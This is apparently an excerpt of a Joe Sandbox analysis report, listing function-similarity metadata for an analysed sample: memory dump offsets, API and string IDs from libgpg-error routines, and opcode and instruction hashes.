                                                            • Instruction ID: 17af1694f27c688ed6b5956a66f06efb6c681ea5d6e9ab497283b7c1dbded4e0
                                                            • Opcode Fuzzy Hash: fe6b770bffc78d495ef4125451ca22e0f10741ae6262d2b33a2a4a0cc1e56cf3
                                                            • Instruction Fuzzy Hash: 2FE05B762012247BE7022F719C09EFF7B5CDF163647008051FE48D6150D772E55087B0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: ad7587be56bb44abaaa1985e6d3787f0885db1cd0b3a732ed57f358b39a47398
                                                            • Instruction ID: 91305535aabd946f9bbdb014bd7815ebab2cf5e8dec08177f19d802083117e8e
                                                            • Opcode Fuzzy Hash: ad7587be56bb44abaaa1985e6d3787f0885db1cd0b3a732ed57f358b39a47398
                                                            • Instruction Fuzzy Hash: B0C08C4010C3809FC3028FA898946893BB18F22200B1660A3A045C7163D0158E0CCB22
                                                            APIs
                                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,00D021A8,?,00000000,?,00000000,?,00D0390C,00000000,?,00000104), ref: 00D014E8
                                                              • Part of subcall function 00D03BD3: GetProcessHeap.KERNEL32(00000000,?,?,00D021CC,?,75C0B390,8000FFFF,?,?,00D40267,?,?,00000000,00000000,8000FFFF), ref: 00D03BDB
                                                              • Part of subcall function 00D03BD3: HeapSize.KERNEL32(00000000,?,00D021CC,?,75C0B390,8000FFFF,?,?,00D40267,?,?,00000000,00000000,8000FFFF), ref: 00D03BE2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$ProcessSizelstrlen
                                                            • String ID:
                                                            • API String ID: 3492610842-0
                                                            • Opcode ID: ec4593930368667de982fd29751db921b651b27959aaff7d282bdbe0e3eee06b
                                                            • Instruction ID: 59b7c2f2eda6deae3ce1d60d3f0720be1c3c7730b6dcacc2a5129d2de30f457e
                                                            • Opcode Fuzzy Hash: ec4593930368667de982fd29751db921b651b27959aaff7d282bdbe0e3eee06b
                                                            • Instruction Fuzzy Hash: 6401F93B600218ABCF119E59DC84F9A77B9EF85764F154219FA1E5B2E1D631DC0086B0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: mallocmemsetstrcpystrlen
                                                            • String ID: $$Assertion "%s" in %s failed (%s:%d)
                                                            • API String ID: 2677608751-3889656839
                                                            • Opcode ID: c524623c40f4d6bb6ac37236f013e60c44d3dce1b05137f9d78d0ef71c8a448d
                                                            • Instruction ID: 45c9a58f3f92917e6e8b9d303c98b4767de72e75ac871d8a95cef16817b25772
                                                            • Opcode Fuzzy Hash: c524623c40f4d6bb6ac37236f013e60c44d3dce1b05137f9d78d0ef71c8a448d
                                                            • Instruction Fuzzy Hash: 831115B451930ADFD784AFA9C64075ABBF5AF46304F519C2DE9889B280E7B8C441CB52
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$CloseHandleLeave$EnterEvent$ObjectSingleWait$DeleteResetfree
                                                            • String ID: ../../libgpg-error-1.43/src/w32-estream.c$nbytes$reader
                                                            • API String ID: 3272993205-3888612630
                                                            • Opcode ID: f76eba3ac157a83a0b668e9b834bf96c4a14234905a1e5131b2eff7762b596ba
                                                            • Instruction ID: 316261f6fa14c9123d8e4262de1671f3b233ff3889982a24c98cd4994c42aa80
                                                            • Opcode Fuzzy Hash: f76eba3ac157a83a0b668e9b834bf96c4a14234905a1e5131b2eff7762b596ba
                                                            • Instruction Fuzzy Hash: 92B117B1504A058FDB40FF78D58852ABBF5FF45300F118A69EC858B259E734E49ACF92
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Create$CloseCountCurrentDirectoryFileHandlePathProcessSleepTempTick_errno_open_osfhandlestrlen
                                                            • String ID: ream
                                                            • API String ID: 2438938358-3784047043
                                                            • Opcode ID: 779c2746930f21810474f4f2e014abe0f4d625c372b15dccdd22545fe95dad94
                                                            • Instruction ID: e091b2a8cf7684d831ac0cb020117f074f0a4f02ec6624e9fb1d5684045ccbfe
                                                            • Opcode Fuzzy Hash: 779c2746930f21810474f4f2e014abe0f4d625c372b15dccdd22545fe95dad94
                                                            • Instruction Fuzzy Hash: F54188B1408B158FD750AF68D88C35ABFF2AB45319F118A2CE8998B2D0D7B5D548CF92
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: strcmp$isspace
                                                            • String ID: $$ignore-invalid-option
                                                            • API String ID: 3924915934-2086654338
                                                            • Opcode ID: 3520aaf835d62f77364c3c84dbe0339f1fe1919f1fd83dac198bd9e45766a222
                                                            • Instruction ID: 48f11cedf03b281be710b4ae03c83d904401da10eb7f2e9b9a112b8509c71656
                                                            • Opcode Fuzzy Hash: 3520aaf835d62f77364c3c84dbe0339f1fe1919f1fd83dac198bd9e45766a222
                                                            • Instruction Fuzzy Hash: E671AE3561830ACBC75CDFA8D49061EBBE2BF89318F55492CF9A49B355D731D841CB82
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _gpg_w32_gettext
                                                            • String ID: /etc$Note: no default option file '%s'
                                                            • API String ID: 2090770927-1112601484
                                                            • Opcode ID: a951994627ebc87e600ca0a58580f377742cc786cf74422c3ec3353e173f630f
                                                            • Instruction ID: 92311010184360e76535cba58c4d6d187c1e026cb0157e64bea8378062f960c4
                                                            • Opcode Fuzzy Hash: a951994627ebc87e600ca0a58580f377742cc786cf74422c3ec3353e173f630f
                                                            • Instruction Fuzzy Hash: B4B127B460470BCFDB44DFA9C294796BBE6BF45305F168998DC888B346D774E890CB81
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: strlen
                                                            • String ID: errno=%s$%s:%s:%d:
                                                            • API String ID: 39653677-2911015030
                                                            • Opcode ID: e080823d365fdfdb78432afdac78a9063c8a17590c5b5756aa96c3b6c42ff7e4
                                                            • Instruction ID: 29ac4f5ea9a6c5da765b64d1b2f7fed8f1ca780e81cc1317b033982989cca9d9
                                                            • Opcode Fuzzy Hash: e080823d365fdfdb78432afdac78a9063c8a17590c5b5756aa96c3b6c42ff7e4
                                                            • Instruction Fuzzy Hash: E221F9B4909716DFCB80DFA9D59865EBBE6BB46318F308A1EE4C487340D3309881CF52
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _gpg_w32_dgettextmemcpystrlen
                                                            • String ID: Success$libgpg-error
                                                            • API String ID: 136027815-2258219154
                                                            • Opcode ID: f833e4fd3dee7b674d5841210749729df3ccbc68f0497ac9dc3bf1f1c4f7b48b
                                                            • Instruction ID: 9ec932a6934dfb5fd1b632ce510162de6372a3a8315b3c43a4d321d948ea7943
                                                            • Opcode Fuzzy Hash: f833e4fd3dee7b674d5841210749729df3ccbc68f0497ac9dc3bf1f1c4f7b48b
                                                            • Instruction Fuzzy Hash: 6BF0A7B6A18318CFC3005FD8DAC0559F7E6BB94715F258C3DD98897300E23598558BC2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _gpg_w32_dgettextmemcpystrlen
                                                            • String ID: Success$libgpg-error
                                                            • API String ID: 136027815-2258219154
                                                            • Opcode ID: 1c59d31fca0014d80959df147f019e90e418c82d6e846e3bbfdc0f241dd685a8
                                                            • Instruction ID: 47258c6c8673ce714ce778d89a8855feeec658c7e61c8df6731a434f8300da9f
                                                            • Opcode Fuzzy Hash: 1c59d31fca0014d80959df147f019e90e418c82d6e846e3bbfdc0f241dd685a8
                                                            • Instruction Fuzzy Hash: CAF082B6A183148BC3405FD8DA80559F7E6AB94615F258C3DD94897300E635D8558BC2
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _gpg_w32_dgettextmemcpystrlen
                                                            • String ID: Success$libgpg-error
                                                            • API String ID: 136027815-2258219154
                                                            • Opcode ID: dbd7fc58106d4e1dedae565eeff82acae7f91e8292a6e04dff2b881d7dd8289c
                                                            • Instruction ID: 6dc1782bec2b09b6d56b6f7e034074a0001ae1f37064b6badd2a1ddc11cd1fbf
                                                            • Opcode Fuzzy Hash: dbd7fc58106d4e1dedae565eeff82acae7f91e8292a6e04dff2b881d7dd8289c
                                                            • Instruction Fuzzy Hash: D5F082B6A183188BC7405FD8DA84559F7E6AB94615F218C3DD94897300E23598558BC2
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _gpg_w32_dgettextmemcpystrlen
                                                            • String ID: Success$libgpg-error
                                                            • API String ID: 136027815-2258219154
                                                            • Opcode ID: 0dd3a697e8137c44d3ed9c2e6f2ebc70116b1d4bc8274cd3af5f45293fbd5468
                                                            • Instruction ID: 97c7c4fcd23bc395640ceefdd7db959c965210437374c4d04ba30ec5f5d71780
                                                            • Opcode Fuzzy Hash: 0dd3a697e8137c44d3ed9c2e6f2ebc70116b1d4bc8274cd3af5f45293fbd5468
                                                            • Instruction Fuzzy Hash: FBF0A7B6A18314CFC3005FD8DA80549F7E6BB94715F218C3DD94897300E23598558BC2
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _gpg_w32_dgettextmemcpystrlen
                                                            • String ID: Success$libgpg-error
                                                            • API String ID: 136027815-2258219154
                                                            • Opcode ID: a937e24c7814195e700a878361b42c9b101097d4f83d845974089cb7a40e938b
                                                            • Instruction ID: 1fa5b82aab28ad97374d04738ccab7d0b359c59d216a7fef696b12ebba08cf1b
                                                            • Opcode Fuzzy Hash: a937e24c7814195e700a878361b42c9b101097d4f83d845974089cb7a40e938b
                                                            • Instruction Fuzzy Hash: EAF0A7B6A18314DFC3005FD8DAC4559F7E6BB95715F258C3DD94897300E23598558BC2
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _gpg_w32_dgettextmemcpystrlen
                                                            • String ID: Success$libgpg-error
                                                            • API String ID: 136027815-2258219154
                                                            • Opcode ID: 67ead66d8971609b24d413a34b3a6e9b1d0a4b73c8c1ec21f6d4762dfccec770
                                                            • Instruction ID: 0620bbda3e2d791e1e8af3ebdb5d1bbfc2ee584d67bd8c05ddcc30c0f5419f3d
                                                            • Opcode Fuzzy Hash: 67ead66d8971609b24d413a34b3a6e9b1d0a4b73c8c1ec21f6d4762dfccec770
                                                            • Instruction Fuzzy Hash: 39F0A7B6A18314CFC3405FE8DAC0559F7E6BB94719F258C3DD94897300E23598558BC2
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _gpg_w32_dgettextmemcpystrlen
                                                            • String ID: Success$libgpg-error
                                                            • API String ID: 136027815-2258219154
                                                            • Opcode ID: e16be703ea5ac4aa73f7c661e3d6bc59427a03ffe1d318872b1d396659d3bd4d
                                                            • Instruction ID: 8675bab67d2ff57d1d9a8428d90b22ebbaf6d53702f963c2e1234800c4e8d654
                                                            • Opcode Fuzzy Hash: e16be703ea5ac4aa73f7c661e3d6bc59427a03ffe1d318872b1d396659d3bd4d
                                                            • Instruction Fuzzy Hash: 38F0A7B6A18314CFC3005FE8DAC0559F7E6BB94719F258C3DD94897300E23598558BC2
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _gpg_w32_dgettextmemcpystrlen
                                                            • String ID: Success$libgpg-error
                                                            • API String ID: 136027815-2258219154
                                                            • Opcode ID: 1d860c2d131fd3a5f4595d3cf135703d6392bda141692c0f4ed69163faf5ca05
                                                            • Instruction ID: 24873dc35737dccb0948eef1098589872a4c28115d57610a5db11f0d52368e65
                                                            • Opcode Fuzzy Hash: 1d860c2d131fd3a5f4595d3cf135703d6392bda141692c0f4ed69163faf5ca05
                                                            • Instruction Fuzzy Hash: E2F0A7B6A18314CFC3005FE8DAC0559F7E6BB94719F258C3DD94897300E23598558BC2
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _errno$ErrorFileLastRead
                                                            • String ID:
                                                            • API String ID: 2044071692-0
                                                            • Opcode ID: bcf341b4f09273abdbc0e7b4a78fcc8d348c9aba45cbbcf68a7e2d069e1330a4
                                                            • Instruction ID: 40ac7c3665f26865f85a267f29bdc1495f7946be8d30deec877b414db1380e3d
                                                            • Opcode Fuzzy Hash: bcf341b4f09273abdbc0e7b4a78fcc8d348c9aba45cbbcf68a7e2d069e1330a4
                                                            • Instruction Fuzzy Hash: A2016DB06097128FC7409F78D8C401AB7F1BF8A325F208A2DE4A9872A4DB30D820CF52
                                                            APIs
                                                              • Part of subcall function 6E237220: malloc.MSVCRT ref: 6E23724F
                                                              • Part of subcall function 6E237220: memset.MSVCRT ref: 6E237269
                                                            • strncmp.MSVCRT ref: 6E244EF6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: mallocmemsetstrncmp
                                                            • String ID: $$$PGP
                                                            • API String ID: 2386774029-819431215
                                                            • Opcode ID: 7c080300707cb54a049c014928585115a6db489a22f87a7b2cdd2d5ca5c1b7ca
                                                            • Instruction ID: 7dd1e43b6930e70e68a0fa15b4d40b9170c5a586d8b7207a4fcde412c3556a2d
                                                            • Opcode Fuzzy Hash: 7c080300707cb54a049c014928585115a6db489a22f87a7b2cdd2d5ca5c1b7ca
                                                            • Instruction Fuzzy Hash: F201B1F250971BCBEB55AFA5E88024BBBE1BF00309F12496DE8844B246D374C941CFD2
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _errno$ErrorFileLastRead
                                                            • String ID:
                                                            • API String ID: 2044071692-0
                                                            • Opcode ID: 02b2a9d844bb0f2e4d7937f25115870278f948afba4fec362e10b13a6c4d809e
                                                            • Instruction ID: 024ad5d2bb9a1c8809839630176d22939995c54da2ba40f1fb4b4e168f544c13
                                                            • Opcode Fuzzy Hash: 02b2a9d844bb0f2e4d7937f25115870278f948afba4fec362e10b13a6c4d809e
                                                            • Instruction Fuzzy Hash: 48015EB16097158FC7409F7DD89451AB7F1BF86314F208A2DE4A9C72A4DB30D820CF52
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _getpidstrlen$localtimetime
                                                            • String ID: [%u]
                                                            • API String ID: 2564112469-1146909518
                                                            • Opcode ID: 671a37ace7c05b9b18a923cc6ec9be4e2732a388f634b28225b7e047032bf489
                                                            • Instruction ID: c0cfaf14ee33056ca3231a4aa554da2ecc9fcf3056ce8f4b4babb52fbd9752dd
                                                            • Opcode Fuzzy Hash: 671a37ace7c05b9b18a923cc6ec9be4e2732a388f634b28225b7e047032bf489
                                                            • Instruction Fuzzy Hash: 93112CB160470ACFD784DFA5C495A2A77F7BB47704F61C918D8D487210E770E452CB61
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: fputcstrerrorstrlen
                                                            • String ID: errno=%s
                                                            • API String ID: 3318081027-2313551297
                                                            • Opcode ID: 392ef233cbb68a705eff29b75de9b85dc57db3a2b7208da5ed3b31e0b78f21b3
                                                            • Instruction ID: ab3159733c37d8de522afa48ad7c2c87b00c6bb126374e99bc70faa805066a23
                                                            • Opcode Fuzzy Hash: 392ef233cbb68a705eff29b75de9b85dc57db3a2b7208da5ed3b31e0b78f21b3
                                                            • Instruction Fuzzy Hash: 63E039F5809B558FCB909FA8999465ABBE2AB06318F318809C48447280D3308480CF42
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _errno$_gpg_w32_dgettextmemcpystrlen
                                                            • String ID: strerror failed: %i
                                                            • API String ID: 3052257591-3251084447
                                                            • Opcode ID: ae565f1a15da14c4ecd18cee2038c778f0c2a61049ac2467137ea84614740605
                                                            • Instruction ID: 57db84988e0519cd71b99195d59ecbd659455de4151b3cf6df2f5103f6363f5e
                                                            • Opcode Fuzzy Hash: ae565f1a15da14c4ecd18cee2038c778f0c2a61049ac2467137ea84614740605
                                                            • Instruction Fuzzy Hash: 46E0E271404708DFC704AFA9C8C0A1EB7E2BF46B00F418859E59A63220D730AC908B8B